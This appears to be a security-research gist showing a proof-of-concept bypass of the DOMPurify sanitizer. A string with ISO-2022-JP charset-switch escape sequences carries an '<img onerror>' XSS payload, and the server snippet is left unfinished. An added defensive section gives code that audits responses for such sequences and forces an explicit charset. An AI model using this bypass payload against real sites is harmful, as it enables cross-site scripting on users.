kevin-mizu / app.js
Created July 15, 2024 16:48
DOMPurify bypass using ISO-2022-JP
const createDOMPurify = require("dompurify");
const { JSDOM } = require("jsdom");
const http = require("http");

const server = http.createServer((req, res) => {
    // DOMPurify runs against a jsdom window on the server side.
    const window = new JSDOM("").window;
    const DOMPurify = createDOMPurify(window);
    // \x1b$B switches an ISO-2022-JP decoder to JIS X 0208 (two-byte mode);
    // \x1b(B switches it back to ASCII.
    const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);
    res.statusCode = 200;
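
A defensive check for the condition this kind of bypass depends on, as an added example that is not part of the gist: a browser only auto-detects ISO-2022-JP when the response declares no charset, so the audit below flags HTML bodies that contain charset-switch escape sequences and are served without one. All function names are hypothetical, and the sample assumes the sanitizer returned the snippet's input string unchanged.

```javascript
// Added example, not from the gist. Helper names are hypothetical.

// Escape sequences the WHATWG ISO-2022-JP decoder treats as charset switches:
// ESC ( B (ASCII), ESC ( J (JIS X 0201 Roman), ESC ( I (Katakana),
// ESC $ @ and ESC $ B (JIS X 0208, two-byte mode).
const ISO2022JP_SWITCH = /\x1b(?:\([BJI]|\$[@B])/g;

// Return every charset-switch sequence found in a string, with its offset.
function findCharsetSwitches(html) {
  return Array.from(html.matchAll(ISO2022JP_SWITCH), (m) => ({
    offset: m.index,
    sequence: "ESC " + m[0].slice(1).split("").join(" "),
  }));
}

// True when a Content-Type header value carries a charset parameter.
function hasExplicitCharset(contentType) {
  return /;\s*charset\s*=\s*"?[\w.:-]+"?/i.test(contentType || "");
}

// Primary fix: declare the charset so the browser never sniffs the encoding.
function withUtf8Charset(contentType) {
  const base = contentType || "text/html";
  return hasExplicitCharset(base) ? base : base + "; charset=utf-8";
}

// Defence in depth: drop ESC (U+001B) from untrusted input BEFORE sanitizing,
// so the sanitizer sees exactly the text that will be served.
function stripEsc(input) {
  return input.replace(/\x1b/g, "");
}

// Audit one outgoing response: at risk when the body carries charset switches
// and the header leaves the encoding for the browser to guess.
function auditHtmlResponse(contentType, body) {
  const switches = findCharsetSwitches(body);
  const declared = hasExplicitCharset(contentType);
  return { declared, switches, atRisk: !declared && switches.length > 0 };
}

// Constructed sample: the input string from the snippet above, treated as
// sanitizer output (assumption).
const SAMPLE = '<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>';

console.log(auditHtmlResponse("text/html", SAMPLE));
console.log(auditHtmlResponse(withUtf8Charset("text/html"), SAMPLE));
```

The audit is meant for response middleware or a test suite; `stripEsc` belongs on the input side, ahead of the sanitizer, not on its output.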